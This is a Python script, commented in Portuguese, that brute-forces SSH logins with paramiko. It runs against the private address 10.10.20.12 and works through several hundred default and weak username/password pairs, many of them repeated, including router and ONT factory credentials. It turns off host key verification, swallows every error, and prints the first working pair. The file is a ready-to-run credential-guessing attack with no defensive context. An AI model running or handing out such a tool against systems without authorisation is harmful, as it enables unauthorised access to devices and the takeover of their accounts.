import subprocess
import sys
import paramiko

# Verifica e instala paramiko se necessário
def install_paramiko():
    try:
        import paramiko
    except ImportError:
        print("Instalando a biblioteca paramiko...")
        subprocess.check_call([sys.executable, "-m", "pip", "install", "paramiko"])
        import paramiko
    return paramiko

paramiko = install_paramiko()

def test_ssh_login(host, port, credentials):
    for username, password in credentials:
        try:
            # Configura o cliente SSH
            client = paramiko.SSHClient()
            client.set_missing_host_key_policy(paramiko.AutoAddPolicy())  # Ignora verificação de chave do host
            
            # Tenta se conectar usando o SSH
            client.connect(host, port=port, username=username, password=password, timeout=10)
            
            # Se o login for bem-sucedido, imprime e retorna
            print(f"Acesso bem-sucedido = {username} - {password}")
            client.close()
            return (username, password)
        
        except paramiko.AuthenticationException:
            # Falha de autenticação é ignorada, tenta a próxima credencial
            continue
        except Exception as e:
            # Qualquer outro erro é ignorado
            continue
    
    # Se nenhuma credencial funcionar, exibe a mensagem final
    print("Nenhuma credencial válida")
    return None


# Configuração
host = "10.10.20.12"
port = 22  # Porta SSH padrão
credenciais = [
    ("",""),
    ("admin", "admin"),
    ("admin", "1234"),
    ("root", "root"),
    ("user", "password"),
    ("admin", "password"),
    ("admin", "fkw123"),
    ("support", "fkw@123"),
    ("admin", "123456"),
    ("admin", "admin123"),
    ("superadmin", "superadmin"),
    ("root", "admin"),
    ("admin", "root"),
    ("admin", "default"),
    ("admin", "12345"),
    ("admin", "pass"),
    ("admin", "0000"),
    ("admin", "4321"),
    ("admin", "admin1"),
    ("admin", "letmein"),
    ("admin", "changeme"),
    ("admin", "qwerty"),
    ("admin", "123admin"),
    ("admin", "welcome"),
    ("admin", "password1"),
    ("admin", "p@ssw0rd"),
    ("admin", "passw0rd"),
    ("user", "user"),
    ("user", "user123"),
    ("user", "12345678"),
    ("admin", "admin@123"),
    ("admin", "administrator"),
    ("administrator", "admin"),
    ("super", "super"),
    ("admin", "!admin"),
    ("root", "toor"),
    ("guest", "guest"),
    ("guest", "12345"),
    ("support", "support"),
    ("support", "support123"),
    ("manager", "manager"),
    ("manager", "manager123"),
    ("root", "password"),
    ("root", "1234"),
    ("root", "123456"),
    ("root", "root123"),
    ("root", "default"),
    ("root", "abc123"),
    ("root", "system"),
    ("root", "pass123"),
    ("root", "12345"),
    ("root", "admin123"),
    ("ont", "ont"),
    ("telecomadmin", "admintelecom"),
    ("telecom", "telecom"),
    ("admin", "1q2w3e"),
    ("admin", "1qaz2wsx"),
    ("admin", "654321"),
    ("admin", "7890"),
    ("admin", "1111"),
    ("admin", "9999"),
    ("admin", "123456789"),
    ("admin", "abc123"),
    ("admin", "admin@admin"),
    ("admin", "1admin"),
    ("admin", "adminpass"),
    ("root", "987654321"),
    ("root", "741852963"),
    ("admin", "pass1234"),
    ("admin", "qwerty123"),
    ("admin", "admin999"),
    ("admin", "test"),
    ("admin", "super"),
    ("admin", "secure"),
    ("admin", "monkey"),
    ("admin", "trustno1"),
    ("admin", "admin!"),
    ("admin", "password123"),
    ("admin", "p@ssword"),
    ("admin", "passw0rd123"),
    ("admin", "adminpass123"),
    ("admin", "adminpassword"),
    ("admin", "pa$$word"),
    ("admin", "letmein123"),
    ("admin", "123admin321"),
    ("admin", "admin007"),
    ("admin", "admin000"),
    ("admin", "login"),
    ("admin", "321admin"),
    ("admin", "passcode"),
    ("admin", "adminsecure"),
    ("admin", "admlogin"),
    ("admin", "adm123"),
    ("admin", "admin0000"),
    ("admin", "master"),
    ("admin", "unlock"),
    ("admin", "goaway"),
    ("admin", "god"),
    ("admin", "welcome123"),
    ("admin", "hello"),
    ("admin", "iloveyou"),
    ("admin", "123qwe"),
    ("admin", "qwe123"),
    ("admin", "123qwerty"),
    ("admin", "admin!@#"),
    ("admin", "admin_123"),
    ("admin", "admin-123"),
    ("admin", "admin.admin"),
    ("admin", "admin+123"),
    ("admin", "default123"),
    ("admin", "defaultpass"),
    ("admin", "defaultpassword"),
    ("admin", "changeit"),
    ("admin", "setup"),
    ("admin", "start"),
    ("admin", "loginadmin"),
    ("admin", "admin4u"),
    ("admin", "adminonly"),
    ("admin", "admin"),
    ("admin", "1234"),
    ("root", "root"),
    ("user", "password"),
    ("admin", "password"),
    ("admin", "fkw123"),
    ("support", "fkw@123"),
    ("admin", "123456"),
    ("admin", "admin123"),
    ("superadmin", "superadmin"),
    ("root", "admin"),
    ("admin", "root"),
    ("admin", "default"),
    ("admin", "12345"),
    ("admin", "pass"),
    ("admin", "0000"),
    ("admin", "4321"),
    ("admin", "admin1"),
    ("admin", "letmein"),
    ("admin", "changeme"),
    ("admin", "qwerty"),
    ("admin", "123admin"),
    ("admin", "welcome"),
    ("admin", "password1"),
    ("admin", "p@ssw0rd"),
    ("admin", "passw0rd"),
    ("user", "user"),
    ("user", "user123"),
    ("user", "12345678"),
    ("admin", "admin@123"),
    ("admin", "administrator"),
    ("administrator", "admin"),
    ("super", "super"),
    ("admin", "!admin"),
    ("root", "toor"),
    ("guest", "guest"),
    ("guest", "12345"),
    ("support", "support"),
    ("support", "support123"),
    ("manager", "manager"),
    ("manager", "manager123"),
    ("root", "password"),
    ("root", "1234"),
    ("root", "123456"),
    ("root", "root123"),
    ("root", "default"),
    ("root", "abc123"),
    ("root", "system"),
    ("root", "pass123"),
    ("root", "12345"),
    ("root", "admin123"),
    ("ont", "ont"),
    ("telecomadmin", "admintelecom"),
    ("telecom", "telecom"),
    ("admin", "1q2w3e"),
    ("admin", "1qaz2wsx"),
    ("admin", "654321"),
    ("admin", "7890"),
    ("admin", "1111"),
    ("admin", "9999"),
    ("admin", "123456789"),
    ("admin", "abc123"),
    ("admin", "admin@admin"),
    ("admin", "1admin"),
    ("admin", "adminpass"),
    ("root", "987654321"),
    ("root", "741852963"),
    ("admin", "pass1234"),
    ("admin", "qwerty123"),
    ("admin", "admin999"),
    ("admin", "test"),
    ("admin", "super"),
    ("admin", "secure"),
    ("admin", "monkey"),
    ("admin", "trustno1"),
    ("admin", "admin!"),
    ("admin", "password123"),
    ("admin", "p@ssword"),
    ("admin", "passw0rd123"),
    ("admin", "adminpass123"),
    ("admin", "adminpassword"),
    ("admin", "pa$$word"),
    ("admin", "letmein123"),
    ("admin", "123admin321"),
    ("admin", "admin007"),
    ("admin", "admin000"),
    ("admin", "login"),
    ("admin", "321admin"),
    ("admin", "passcode"),
    ("admin", "adminsecure"),
    ("admin", "admlogin"),
    ("admin", "adm123"),
    ("admin", "admin0000"),
    ("admin", "master"),
    ("admin", "unlock"),
    ("admin", "goaway"),
    ("admin", "god"),
    ("admin", "welcome123"),
    ("admin", "hello"),
    ("admin", "iloveyou"),
    ("admin", "123qwe"),
    ("admin", "qwe123"),
    ("admin", "123qwerty"),
    ("admin", "admin!@#"),
    ("admin", "admin_123"),
    ("admin", "admin-123"),
    ("admin", "admin.admin"),
    ("admin", "admin+123"),
    ("admin", "default123"),
    ("admin", "defaultpass"),
    ("admin", "defaultpassword"),
    ("admin", "changeit"),
    ("admin", "setup"),
    ("admin", "start"),
    ("admin", "loginadmin"),
    ("admin", "admin4u"),
    ("admin", "adminonly"),
    ("admin", "admin"),
    ("admin", "1234"),
    ("admin", "password"),
    ("admin", "admin123"),
    ("user", "user"),
    ("admin", "letmein"),
    ("root", "root"),
    ("root", "toor"),
    ("administrator", "admin"),
    ("admin", "default"),
    ("admin", "123456"),
    ("admin", "welcome"),
    ("admin", "12345"),
    ("admin", "password1"),
    ("admin", "qwerty"),
    ("admin", "pass123"),
    ("user", "user123"),
    ("user", "password123"),
    ("root", "1234"),
    ("root", "root123"),
    ("admin", "12345"),
    ("guest", "guest"),
    ("support", "support"),
    ("admin", "superadmin"),
    ("admin", "test"),
    ("admin", "master"),
    ("admin", "adminadmin"),
    ("root", "rootroot"),
    ("admin", "changeme"),
    ("user", "password1"),
    ("admin", "admin1"),
    ("admin", "1q2w3e"),
    ("admin", "qwerty123"),
    ("admin", "letmein123"),
    ("admin", "123qwe"),
    ("admin", "123qwerty"),
    ("admin", "abc123"),
    ("admin", "password123"),
    ("admin", "password1"),
    ("user", "password"),
    ("admin", "rootadmin"),
    ("admin", "adminpass"),
    ("user", "userpass"),
    ("admin", "admin!"),
    ("root", "12345"),
    ("admin", "secure"),
    ("admin", "admin1234"),
    ("admin", "adminpass123"),
    ("root", "adminpass"),
    ("admin", "test1234"),
    ("admin", "password12"),
    ("admin", "abc12345"),
    ("admin", "adminpassword"),
    ("admin", "root1234"),
    ("admin", "12345678"),
    ("root", "password123"),
    ("user", "root"),
    ("admin", "god"),
    ("admin", "123qwe123"),
    ("admin", "secure123"),
    ("admin", "letmein1234"),
    ("admin", "password!"),
    ("admin", "adminpass!"),
    ("admin", "1password"),
    ("root", "rootpass"),
    ("admin", "qwerty1234"),
    ("admin", "super123"),
    ("admin", "password2025"),
    ("admin", "admin2025"),
    ("root", "rootpass123"),
    ("admin", "admin12345"),
    ("admin", "myadmin"),
    ("admin", "guest123"),
    ("root", "guest123"),
    ("admin", "1admin"),
    ("admin", "testadmin"),
    ("user", "testpassword"),
    ("admin", "rootadmin123"),
    ("admin", "123test"),
    ("admin", "1234admin"),
    ("admin", "administrator1"),
    ("admin", "adminroot"),
    ("user", "adminuser"),
    ("admin", "letmein12345"),
    ("admin", "admin_123"),
    ("root", "rootadmin123"),
    ("admin", "rootpass123"),
    ("admin", "adminpassword1"),
    ("user", "testuser"),
    ("admin", "password01"),
    ("admin", "admin123123"),
    ("admin", "rootadminroot"),
    ("admin", "rootroot123"),
    ("user", "guest12345"),
    ("admin", "welcome123"),
    ("admin", "qwertyadmin"),
    ("admin", "adminqwerty"),
    ("user", "useradmin"),
    ("root", "adminroot123"),
    ("admin", "master123"),
    ("admin", "security123"),
    ("admin", "admin_master"),
    ("admin", "rootadmin321"),
    ("user", "user_admin"),
    ("admin", "testadmin123"),
    ("admin", "password321"),
    ("admin", "admin"),
    ("admin", "1234"),
    ("admin", "password"),
    ("admin", "admin123"),
    ("user", "user"),
    ("admin", "letmein"),
    ("root", "root"),
    ("root", "toor"),
    ("administrator", "admin"),
    ("admin", "default"),
    ("admin", "123456"),
    ("admin", "welcome"),
    ("admin", "12345"),
    ("admin", "password1"),
    ("admin", "qwerty"),
    ("admin", "pass123"),
    ("user", "user123"),
    ("user", "password123"),
    ("root", "1234"),
    ("root", "root123"),
    ("admin", "12345"),
    ("guest", "guest"),
    ("support", "support"),
    ("admin", "superadmin"),
    ("admin", "test"),
    ("admin", "master"),
    ("admin", "adminadmin"),
    ("root", "rootroot"),
    ("admin", "changeme"),
    ("user", "password1"),
    ("admin", "admin1"),
    ("admin", "1q2w3e"),
    ("admin", "qwerty123"),
    ("admin", "letmein123"),
    ("admin", "123qwe"),
    ("admin", "123qwerty"),
    ("admin", "abc123"),
    ("admin", "password123"),
    ("admin", "password1"),
    ("user", "password"),
    ("admin", "rootadmin"),
    ("admin", "adminpass"),
    ("user", "userpass"),
    ("admin", "admin!"),
    ("root", "12345"),
    ("admin", "secure"),
    ("admin", "admin1234"),
    ("admin", "adminpass123"),
    ("root", "adminpass"),
    ("admin", "test1234"),
    ("admin", "password12"),
    ("admin", "abc12345"),
    ("admin", "adminpassword"),
    ("admin", "root1234"),
    ("admin", "12345678"),
    ("root", "password123"),
    ("user", "root"),
    ("admin", "god"),
    ("admin", "123qwe123"),
    ("admin", "secure123"),
    ("admin", "letmein1234"),
    ("admin", "password!"),
    ("admin", "adminpass!"),
    ("admin", "1password"),
    ("root", "rootpass"),
    ("admin", "qwerty1234"),
    ("admin", "super123"),
    ("admin", "password2025"),
    ("admin", "admin2025"),
    ("root", "rootpass123"),
    ("admin", "admin12345"),
    ("admin", "myadmin"),
    ("admin", "guest123"),
    ("root", "guest123"),
    ("admin", "1admin"),
    ("admin", "testadmin"),
    ("user", "testpassword"),
    ("admin", "rootadmin123"),
    ("admin", "123test"),
    ("admin", "1234admin"),
    ("admin", "administrator1"),
    ("admin", "adminroot"),
    ("user", "adminuser"),
    ("admin", "letmein12345"),
    ("admin", "admin_123"),
    ("root", "rootadmin123"),
    ("admin", "rootpass123"),
    ("admin", "adminpassword1"),
    ("user", "testuser"),
    ("admin", "password01"),
    ("admin", "admin123123"),
    ("admin", "rootadminroot"),
    ("admin", "rootroot123"),
    ("user", "guest12345"),
    ("admin", "welcome123"),
    ("admin", "qwertyadmin"),
    ("admin", "adminqwerty"),
    ("user", "useradmin"),
    ("root", "adminroot123"),
    ("admin", "master123"),
    ("admin", "security123"),
    ("admin", "admin_master"),
    ("admin", "rootadmin321"),
    ("user", "user_admin"),
    ("admin", "testadmin123"),
    ("admin", "password321"),
    ("admin", "fwadmin"),
    ("admin", "fwadmin123"),
    ("admin", "fw12345"),
    ("root", "rootfw"),
    ("Admin",""),
    ("admin",""),
    ("Admin","Admin"),
    ("Admin","admin"),
    ("admin","admin"),


]

# Execução
test_ssh_login(host, port, credenciais)
